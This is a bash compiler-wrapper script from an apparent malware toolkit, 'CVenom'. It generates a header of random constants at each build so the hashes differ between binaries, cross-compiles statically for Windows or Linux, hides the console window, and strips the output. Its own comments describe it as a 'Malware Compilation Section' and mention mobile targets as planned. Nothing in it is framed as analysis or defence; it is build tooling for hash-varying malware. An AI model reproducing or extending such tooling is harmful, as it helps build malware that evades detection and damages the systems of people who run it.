#!/bin/bash


outputfile="./a.out"
otrig=0
random="$HOME/.CVenom/PSBinaries/Linux/dr_RETi"
dyn_hds="// this header is randomly generated at compile time.

#define RZ_STACK   $($random)
#define RZ_HEAP    $($random)
#define RZ_TEXT_1  long int Rz1=$($random)+$($random)-$($random)
#define RZ_TEXT_2  long int Rz2=$($random)+$($random)-$($random)
#define RZ_TEXT_3  long int Rz3=(Rz1+Rz2)/$($random)
#define RZ_RO_DATA $($random)
#define RZ_RW_DATA $($random)
#define RZI1       $($random)
#define RZI2       $($random)
#define RZI3       $($random)
#define RZI4       $($random)
#define RZI5       $($random)
"

printf "$dyn_hds" > $HOME/.CVenom/CTDynamic/dyn_s2hashes.hxx

function fatal(){
	printf "\033[1;37mcvg++:\033[1;31m fatal error:\033[0;97m $1\n"
}


if [ "$2" == '' ];then
	fatal "no target OS provided"
	echo "compilation terminated."
	exit 1
fi

if [ ! -f "$1" ];then
	fatal "$1: No such file or directory"
	echo "compilation terminated."
	exit 1
fi

export "$2"

set $1 $3 $4 $5 $6 $7 $8 $9 &> /dev/null

if [ "$target" == "windows" ] || [ "$target" == "win64" ];then
	export compiler="x86_64-w64-mingw32-g++"
	export striper="x86_64-w64-mingw32-strip"
	export add_opts="-lpsapi -lws2_32 -mwindows"
	CVPath="CVWindows"
elif [ "$target" == "win32" ];then
	export compiler="i686-w64-mingw32-g++"
	export striper="i686-w64-mingw32-strip"
	export add_opts="-lpsapi -lws2_32 -mwindows"
	CVPath="CVWindows"
elif [ "$target" == "linux" ];then
	export compiler="g++"
	export striper="strip"
	export add_opts="-lpthread"
	CVPath="CVLinux"
elif [ "$target" == "mobile" ] || [ "$target" == "ios" ] || [ "$target" == "android" ];then
	fatal "target OS is currently under preparation (compiling malwares for mobile phones)"; echo "compilation terminated."; exit 1;
else fatal "target OS unknown"; echo "compilation terminated."; exit 1;

fi

for i in "$@" ; do
	if [ "$i" == "-o" ];then
		otrig=1
		continue
	elif [ $otrig == 1 ];then
		outputfile="$i"
		break
	fi
done



# Malware Compilation Section (For Windows And Linux, Android And iOS Aren't Currently Supported)

$compiler -Wall -static -I ~/.CVenom/$CVPath/ -I ~/.CVenom/CTDynamic/ $@ $add_opts
$striper $outputfile
